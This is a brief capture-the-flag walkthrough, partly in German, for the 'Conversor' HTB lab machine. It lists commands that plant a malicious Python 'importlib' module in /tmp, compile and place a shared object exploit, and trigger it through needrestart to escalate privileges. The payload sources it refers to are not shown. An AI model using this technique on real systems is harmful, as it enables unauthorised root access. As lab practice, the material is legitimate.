
i tried this in Conversor HTB machine
Hallo, dies ist 0x3bs
Auf dem Opfer-Rechner:
set -e
cd /tmp
# 1. Create the malicious module directory structure
mkdir -p malicious/importlib
auf dem Angreifer-Rechner
um lib.c auf dem Angreifer-Rechner zu kompilieren:
gcc -shared -fPIC -o exp.so lib.c
und auf dem Opfer-Rechner :
in /tmp
chmod +x run.sh
in /tmp/malicious/importlib :
chmod +x exp.so
./exp.so
# try to run it after run 'run.sh' if it didn't work
und in /tmp
./run.sh
und in einer anderen Sitzung needrestart ausführen
Denken Sie daran >> die exp.so muss sich in /tmp/malicious/importlib befinden